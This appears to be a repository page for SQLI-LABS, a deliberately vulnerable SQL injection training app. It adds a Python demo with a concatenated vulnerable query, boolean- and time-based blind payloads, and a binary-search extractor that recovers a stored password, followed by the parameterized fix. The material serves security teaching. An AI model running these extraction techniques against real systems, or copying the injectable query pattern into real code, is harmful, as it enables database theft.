Work through guided lessons on error-based, boolean-based blind, and time-based blind SQL injection in a local practice environment.
Practice bypassing common SQL injection defenses like blacklists and input sanitization in a controlled setting.
Attempt challenge lessons (54 onward) that test injection skills without step-by-step guidance, simulating real-world conditions.
Learn how SQL injection works through HTTP headers like cookies and user-agent strings, not just URL parameters.
Requires a local Apache and MySQL stack such as XAMPP or WAMP to run the PHP application.
SQLI-LABS is a deliberately vulnerable PHP web application for learning how SQL injection attacks work. SQL injection is a vulnerability in which attacker-supplied input is concatenated into a database query and is therefore interpreted as part of the query's SQL rather than as data, potentially letting the attacker read, modify, or delete data the application stores.

The project sets up a local practice environment with a series of lessons, each covering a different category of SQL injection technique: error-based injection (the attacker reads data out of the database's error messages), boolean-based blind injection (the page returns no data directly, but its response differs depending on whether an injected condition is true, so the attacker can extract information by asking yes-or-no questions), and time-based blind injection (the response does not differ at all, so the attacker injects a conditional delay and measures the response time). Further lessons cover injection into UPDATE and INSERT statements, injection through HTTP headers such as cookies and the User-Agent string, second-order injection (input that is stored safely and only becomes dangerous when it is reused in a later query), and techniques for bypassing common defenses such as keyword blacklists and input sanitization functions.

Installation involves unzipping the project into an Apache web server directory, setting the database credentials in a configuration file, and opening a setup page in the browser to create the database and tables. After that, each lesson is reachable by clicking its number on the index page. The repository also includes challenge lessons (from lesson 54 onward) that test the skills from the earlier material without step-by-step guidance. Video walkthroughs and written explanations for the lessons are available on separate sites linked from the README. The project is intended for security students and developers who want hands-on practice finding and exploiting SQL injection in a controlled, legal environment.
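How the boolean-based and time-based blind techniques described above actually extract data, as an added example that is not code from the sqli-labs project: it reproduces the labs' vulnerable query pattern (request parameter concatenated into the SQL text) against an in-memory SQLite database instead of the PHP/MySQL stack the labs use, drives a boolean oracle and a timing oracle against it, recovers a password one character at a time by binary search, and shows the parameterized query that closes the hole. The table contents, the `sleep()` function registered as a stand-in for MySQL's SLEEP(), and all function names are assumptions of this example.

```python
import sqlite3
import time

# Constructed sample rows standing in for a lab "users" table (not the project's data).
SAMPLE_USERS = [
    (1, "alice", "Summer2024!"),
    (2, "bob", "hunter2"),
    (3, "carol", "letmein"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL database the labs create."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    # SQLite has no delay function; sleep() is registered here as a stand-in for MySQL's SLEEP().
    conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn


def vulnerable_lookup(conn, user_id):
    """The lab pattern: the request parameter is concatenated straight into the query text."""
    sql = "SELECT username, password FROM users WHERE id='" + user_id + "' LIMIT 1"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, user_id):
    """Same query with a bound parameter: the input is always data, never SQL."""
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()


def boolean_oracle(conn, condition):
    """Boolean-based blind: the page only reveals whether the query returned a row.

    The payload keeps the quotes balanced so the trailing ' LIMIT 1 still parses.
    """
    payload = "1' AND (" + condition + ") AND '1'='1"
    return len(vulnerable_lookup(conn, payload)) > 0


def time_oracle(conn, condition, delay=0.2):
    """Time-based blind: the output never changes, only the response time does."""
    payload = ("1' AND CASE WHEN (" + condition + ") THEN sleep(" + str(delay)
               + ") ELSE 0 END AND '1'='1")
    start = time.monotonic()
    vulnerable_lookup(conn, payload)
    return time.monotonic() - start >= delay / 2


def bisect_value(oracle, expr, lo, hi):
    """Binary-search the integer value of a SQL expression in [lo, hi] with yes/no questions."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(expr + " > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, subquery, max_len=64):
    """Recover a string from a subquery result: first its length, then each code point.

    Works with either oracle above, since both answer a single SQL condition.
    """
    length = bisect_value(oracle, "length((" + subquery + "))", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        expr = "unicode(substr((" + subquery + ")," + str(pos) + ",1))"
        chars.append(chr(bisect_value(oracle, expr, 32, 126)))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    secret = "SELECT password FROM users WHERE username='alice'"
    print("boolean-blind recovered:", extract_string(lambda c: boolean_oracle(db, c), secret))
    print("timing says 1=1 is true:", time_oracle(db, "1=1"))
    print("vulnerable:", vulnerable_lookup(db, "1' AND '1'='1"))
    print("hardened:  ", hardened_lookup(db, "1' AND '1'='1"))
```

Each character costs about seven yes/no questions (binary search over printable ASCII), which is why real blind extraction is scripted rather than done by hand; the same `extract_string` works unchanged with `time_oracle` as its oracle, just slower by one delay per "yes". The hardened lookup returns nothing for the injected value because the whole string is bound as the id, which is the fix the labs' bypass lessons are ultimately teaching around.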
Repository author: audi-1 (on gitmyhub).